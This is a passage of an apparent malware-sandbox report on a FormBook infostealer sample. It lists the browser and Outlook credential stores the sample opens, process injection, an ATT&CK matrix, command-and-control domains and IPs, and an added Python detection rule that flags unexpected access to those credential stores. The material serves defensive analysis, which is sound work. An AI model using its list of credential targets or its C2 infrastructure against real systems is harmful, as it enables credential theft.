Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: rDHL8350232025-2.exe | Binary or memory string: WIN_81
Source: rDHL8350232025-2.exe | Binary or memory string: WIN_XP
Source: rDHL8350232025-2.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: rDHL8350232025-2.exe | Binary or memory string: WIN_XPe
Source: rDHL8350232025-2.exe | Binary or memory string: WIN_VISTA
Source: rDHL8350232025-2.exe | Binary or memory string: WIN_7
Source: rDHL8350232025-2.exe | Binary or memory string: WIN_8
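The file and registry accesses above are what drive the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures: a process living in SysWOW64 under a made-up name opens Chrome and Edge Login Data, Cookies, Web Data and Local State, then the Outlook profile key under Windows Messaging Subsystem. Local State is on the list because Chrome keeps the DPAPI-wrapped key that protects its password and cookie blobs there, so a stealer that copies Login Data needs it too. The following Python is an added detection example, not part of the report: it applies one rule to lines in the report's "File opened" / "Key opened" layout, flagging any process other than the store's own browser or mail client that touches these artifacts, with the ATT&CK technique a practitioner would tag. The sample lines are constructed from this report plus two benign ones (chrome.exe reading its own database, netbtugc.exe opening a PDF) for contrast; the owner-process lists and the path patterns are this example's assumptions.

```python
import ntpath
import re
from collections import defaultdict

# Constructed from this report's "Stealing of Sensitive Information" entries,
# with two benign lines added for contrast.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe File opened: C:\Users\user\Documents\invoice.pdf
"""

LINE_RE = re.compile(r"^Source: (?P<src>.+?) (?P<kind>File opened|Key opened): (?P<target>.+)$")

# (pattern over the opened path, store label, ATT&CK technique, processes expected to touch it)
CREDENTIAL_STORES = [
    (re.compile(r"\\Google\\Chrome\\User Data\\(?:.*\\)?(Login Data|Web Data)$", re.I),
     "Chrome credentials/autofill", "T1555.003 Credentials from Web Browsers", {"chrome.exe"}),
    (re.compile(r"\\Google\\Chrome\\User Data\\(?:.*\\)?Cookies$", re.I),
     "Chrome cookies", "T1539 Steal Web Session Cookie", {"chrome.exe"}),
    (re.compile(r"\\Google\\Chrome\\User Data\\(?:.*\\)?Local State$", re.I),
     "Chrome Local State (DPAPI-wrapped os_crypt key)", "T1555.003 Credentials from Web Browsers", {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\(?:.*\\)?(Login Data|Web Data)$", re.I),
     "Edge credentials/autofill", "T1555.003 Credentials from Web Browsers", {"msedge.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\(?:.*\\)?Cookies$", re.I),
     "Edge cookies", "T1539 Steal Web Session Cookie", {"msedge.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
                r"Windows Messaging Subsystem\\Profiles\\", re.I),
     "Outlook MAPI profile", "T1552.002 Credentials in Registry", {"outlook.exe"}),
]


def classify_access(process, target):
    """Return (store, technique, suspicious) when target is a known credential store, else None.
    The access is suspicious when the process is not one of the store's expected owners."""
    exe = ntpath.basename(process).lower()
    for pattern, store, technique, owners in CREDENTIAL_STORES:
        if pattern.search(target):
            return store, technique, exe not in owners
    return None


def flag_credential_access(text):
    """Parse report-style lines; keep only accesses by a process that does not own the store."""
    hits = []
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        verdict = classify_access(m["src"], m["target"])
        if verdict and verdict[2]:
            hits.append((ntpath.basename(m["src"]), verdict[0], verdict[1], m["target"]))
    return hits


def summary(text):
    """Process -> sorted list of ATT&CK techniques its flagged accesses map to."""
    out = defaultdict(set)
    for exe, _, technique, _ in flag_credential_access(text):
        out[exe].add(technique)
    return {exe: sorted(t) for exe, t in out.items()}


if __name__ == "__main__":
    for exe, store, technique, target in flag_credential_access(SAMPLE_LINES):
        print(f"{exe}: {store} [{technique}] <- {target}")
    print(summary(SAMPLE_LINES))
```

The rule deliberately keys on who opens the store rather than on the file name alone, since the browser itself opens these databases constantly; in an EDR query the same idea becomes a file-open event filtered on the target path with the image name not in the owner set. Firefox is absent from the pattern list only because this report shows netbtugc.exe reaching Firefox through injection rather than by opening its profile files.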

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\rDHL8350232025-2.exe | Code function: 0_2_000B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (the report's 14-column grid, flattened to one line per tactic; techniques are listed in the report's row order and a leading number is carried over from the matrix cell as shown)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 12 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1585371, sample rDHL8350232025-2.exe, start date 07/01/2025, architecture WINDOWS, score 100)

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures
Contacted from the sample: www.joyesi.xyz, www.techchains.info, 17 other IPs or domains (Performs DNS queries to domains with low reputation)

Process tree:
rDHL8350232025-2.exe (started)
    signatures: Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Writes to foreign memory regions; 2 other signatures
    -> svchost.exe (started)
        signatures: Maps a DLL or memory area into another process
        -> qSVRmrwLYsrJTsNjTGrEW.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> netbtugc.exe (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> qSVRmrwLYsrJTsNjTGrEW.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    network: www.rssnewscast.com 91.195.240.94 ports 49985, 49986, 49987 (SEDO-ASDE, Germany); www.3xfootball.com 154.215.72.110 ports 49736, 80 (POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles); 5 other IPs or domains
                -> firefox.exe (started)

Source | Detection | Scanner | Label
rDHL8350232025-2.exe | 53% | ReversingLabs | Win32.Backdoor.FormBook
rDHL8350232025-2.exe | 100% | Avira | DR/AutoIt.Gen8
rDHL8350232025-2.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://www.empowermedeco.com/fo8o/?FPJps=mxnR | 0% | Avira URL Cloud | safe
http://www.empowermedeco.com | 0% | Avira URL Cloud | safe
http://www.empowermedeco.com/fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 | 0% | Avira URL Cloud | safe
http://www.techchains.info/fo8o/ | 100% | Avira URL Cloud | malware
http://www.3xfootball.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== | 0% | Avira URL Cloud | safe
http://www.rssnewscast.com/fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0 | 100% | Avira URL Cloud | malware
http://www.magmadokum.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== | 0% | Avira URL Cloud | safe
http://www.goldenjade-travel.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | 100% | Avira URL Cloud | malware
http://www.elettrosistemista.zip/fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Reputation
elettrosistemista.zip | 195.110.124.133 | true | false | high
empowermedeco.com | 217.196.55.202 | true | false | high
www.3xfootball.com | 154.215.72.110 | true | true | unknown
www.goldenjade-travel.com | 116.50.37.244 | true | false | high
www.rssnewscast.com | 91.195.240.94 | true | true | unknown
www.techchains.info | 66.29.149.46 | true | true | unknown
natroredirect.natrocdn.com | 85.159.66.93 | true | false | high
www.magmadokum.com | unknown | unknown | true | unknown
www.donnavariedades.com | unknown | unknown | false | high
www.660danm.top | unknown | unknown | true | unknown
www.joyesi.xyz | unknown | unknown | false | high
www.liangyuen528.com | unknown | unknown | true | unknown
www.kasegitai.tokyo | unknown | unknown | true | unknown
www.empowermedeco.com | unknown | unknown | false | high
www.k9vyp11no3.cfd | unknown | unknown | true | unknown
www.elettrosistemista.zip | unknown | unknown | false | high
www.shenzhoucui.com | unknown | unknown | true | unknown
www.antonio-vivaldi.mobi | unknown | unknown | true | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.empowermedeco.com/fo8o/ | false | - | high
http://www.elettrosistemista.zip/fo8o/ | false | - | high
http://www.empowermedeco.com/fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 | true | Avira URL Cloud: safe | unknown
http://www.magmadokum.com/fo8o/ | false | - | high
http://www.rssnewscast.com/fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0 | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== | true | Avira URL Cloud: malware | unknown
http://www.elettrosistemista.zip/fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== | true | Avira URL Cloud: malware | unknown
http://www.3xfootball.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/ | false | - | high
http://www.magmadokum.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== | true | Avira URL Cloud: safe | unknown
http://www.goldenjade-travel.com/fo8o/ | false | - | high
http://www.techchains.info/fo8o/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.empowermedeco.com | qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4464152837.0000000005281000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.4464718266.00000000059F0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.sedo.com/services/parking.php3 | qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.empowermedeco.com/fo8o/?FPJps=mxnR | netbtugc.exe, 00000004.00000002.4463074784.000000000490A000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000430A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | true
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | true
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585371
Start date and time: 2025-01-07 15:31:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rDHL8350232025-2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@15/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 42
• Number of non-executed functions: 313
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target qSVRmrwLYsrJTsNjTGrEW.exe, PID 3576 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: rDHL8350232025-2.exe
Time | Type | Description
09:32:46 | API Interceptor | 11444415x Sleep call for process: netbtugc.exe modified
Match: 91.195.240.94
Associated Sample Name / URL | Detection | Threat Name | Context
DHL 8350232025-1.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
DHL 745-12302024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
DHL 806-232024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
DHL 0737-12182024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
DHL 073412182024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
236236236.elf | malicious | Unknown | suboyule.736t.com/
DHL 40312052024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
DHL 30312052024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
CCE 30411252024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 11-18720.exe | malicious | FormBook | www.rssnewscast.com/fo8o/

Match: 154.215.72.110
Associated Sample Name / URL | Detection | Threat Name | Context
wOoESPII08.exe | malicious | FormBook | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
N2sgk6jMa2.exe | malicious | FormBook | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
Document 151-512024.exe | malicious | FormBook | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
Match: www.3xfootball.com
Associated Sample Name / URL | Detection | Threat Name | Context
DHL 8350232025-1.exe | malicious | FormBook | 154.215.72.110
DHL 745-12302024.exe | malicious | FormBook | 154.215.72.110
DHL 806-232024.exe | malicious | FormBook | 154.215.72.110
DHL 0737-12182024.exe | malicious | FormBook | 154.215.72.110
DHL 073412182024.exe | malicious | FormBook | 154.215.72.110
DHL 40312052024.exe | malicious | FormBook | 154.215.72.110
DHL 30312052024.exe | malicious | FormBook | 154.215.72.110
CCE 30411252024.exe | malicious | FormBook | 154.215.72.110
Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
Certificate 11-19AIS.exe | malicious | FormBook | 154.215.72.110

Match: www.goldenjade-travel.com
Associated Sample Name / URL | Detection | Threat Name | Context
DHL 8350232025-1.exe | malicious | FormBook | 116.50.37.244
DHL 745-12302024.exe | malicious | FormBook | 116.50.37.244
DHL 806-232024.exe | malicious | FormBook | 116.50.37.244
DHL 0737-12182024.exe | malicious | FormBook | 116.50.37.244
DHL 073412182024.exe | malicious | FormBook | 116.50.37.244
DHL 40312052024.exe | malicious | FormBook | 116.50.37.244
DHL 30312052024.exe | malicious | FormBook | 116.50.37.244
CCE 30411252024.exe | malicious | FormBook | 116.50.37.244
Certificate 11-18720.exe | malicious | FormBook | 116.50.37.244
Certificate 11-19AIS.exe | malicious | FormBook | 116.50.37.244
Match | Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | --- | ---
POWERLINE-AS-APPOWERLINEDATACENTERHK | DHL 8350232025-1.exe | malicious | FormBook | 154.215.72.110
| i686.elf | malicious | Mirai | 156.244.6.20
| z0r0.spc.elf | malicious | Mirai | 156.242.206.56
| i686.elf | malicious | Mirai | 156.244.6.20
| 3.elf | malicious | Unknown | 154.89.139.24
| PKHDJwnF0I.exe | malicious | GhostRat | 156.251.17.243
| 8R2YjBA8nI.exe | malicious | GhostRat | 156.251.17.243
| Hilix.ppc.elf | malicious | Mirai | 45.202.220.139
| Hilix.sh4.elf | malicious | Mirai | 45.202.220.141
| DHL 745-12302024.exe | malicious | FormBook | 154.215.72.110
REGISTER-ASIT | DHL 8350232025-1.exe | malicious | FormBook | 195.110.124.133
